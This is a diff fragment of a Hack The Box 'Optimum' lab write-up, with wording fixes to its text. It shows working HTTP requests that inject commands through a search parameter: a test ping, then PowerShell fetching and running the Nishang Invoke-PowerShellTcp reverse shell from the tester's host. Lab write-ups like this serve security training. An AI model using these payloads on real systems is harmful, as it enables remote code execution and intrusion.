Kyuu-Ji/htb-write-up/optimum/write-up-optimum.md

 GET /?search=%00{.exec|ping 10.10.14.23.} HTTP/1.1
 ```

-The `tcpdump` on my local machine waits for connections and after sending this request is outputs the ICMP packets.
+The `tcpdump` on my local machine waits for connections and after sending this request it outputs the ICMP packets.
 We have command execution and can start a reverse shell on this box.

-For this task I will use the Powershell script **Invoke-PowerShellTcp.ps1** from the **Nishang Framework** that will start a listener on my IP and port 9001.
+For this task I will use the Powershell script **Invoke-PowerShellTcp.ps1** from the **Nishang Framework** that will listen on my IP and port 9001.
 ```markdown
 GET /?search=%00{.exec|C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/Invoke-PowerShellTcp.ps1').} HTTP/1.1